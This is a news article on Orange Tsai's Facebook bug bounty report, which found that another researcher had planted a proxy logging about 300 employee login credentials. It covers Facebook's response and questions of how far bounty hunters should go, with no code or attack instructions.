|Image (c) Facebook|
Tsai said that the hacker created a proxy on the login page of the employees. This was done so that the usernames and passwords from the employees were saved on a directory which the hackers could have collected any time they wanted.
In addition, the login credentials harvested from the web directories could have been used to access email accounts, other virtual private networks and tools. The credentials for other login requirements could have been the same.
There is also the factor that the Facebook employees could have been using the same credentials on their personal accounts such as emails and accounts for other social media networks. Some of them may even use the same username which would make it easier for the hackers to gain access to their other accounts.
Even if the Facebook user data is stored on different servers or networks, the access credentials taken from the corporate accounts could have been used to access the user data either way. Tsai said that there were about 300 logged credentials when the proxy was found.
Tsai's job was to test the Facebook network for any vulnerabilities or exploits that others could use. In their line of job, the method is known as penetration testing. They need to find any valid vulnerability and report it to the company involved. It could be said that they are ethical white hat hackers.
The reward for Tsai was part of the Bug Bounty from the social network giant. Facebook pays off bounties to those who can discover vulnerabilities, bugs and glitches that could otherwise be used to disrupt the flow of the social network.
"With the growing popularity of Facebook around the world, I’ve always been interested in testing the security of Facebook. Luckily, in 2012, Facebook launched the Bug Bounty Program, which even motivated me to give it a shot. Of course, Bug Bounty is nothing about firing random attacks without restrictions. By comparing your findings with the permitted actions set forth by Bug Bounty, the overlapping part will be the part worth trying," Tsai wrote in his own blog post.
Tsai alerted Facebook regarding the vulnerability in February. After the incident was reported, Facebook conducted an internal investigation.
On April 20, the investigation officially ended. Devcore was then given permission to publish the details of the hack. Fortunately, the other hacker was also just a researcher and not a black or gray hat hacker. The other security researcher was also finding out if there were vulnerabilities in the network.
Facebook did not name who the other hacker was and if he/she was awarded a bounty. The company didn’t seem to be bothered that there was a vulnerability that could have led to billions of people's accounts being compromised to a hacker.
The company commented on Hacker News: "This is Reginaldo from the Facebook Security team. We're really glad Orange reported this to us. On this case, the software we were using is third party. As we don't have full control of it, we ran it isolated from the systems that host the data people share on Facebook. We do this precisely to have better security, as chromakode mentioned. After incident response, we determined that the activity Orange detected was in fact from another researcher who participates in our bounty program. Neither of them were able to compromise other parts of our infra-structure so, the way we see it, it's a double win: two competent researchers assessed the system, one of them reported what he found to us and got a good bounty, none of them were able to escalate access."
Despite the interesting find, both of the hackers seemed to have gone far beyond the basic penetration testing. The first hacker who got to the proxies and login credentials have already stumbled upon a large vulnerability and it would seem that he/she was still looking for something bigger before reporting to Facebook.
Even Tsai stepped out a bit of line too, according to Sophos. However, he wouldn't have found the earlier hacker's track if he didn't do what he has done. Either way, it was a risky win-win situation for Facebook.
If either of the hackers were not security researchers or were not snooping around because of the Facebook Bug Bounty program, the credentials would have been lost. It's actually one of the reasons why Facebook has a program for those vulnerabilities, to discourage hackers from using them for their own benefit.
Author: Lord Marin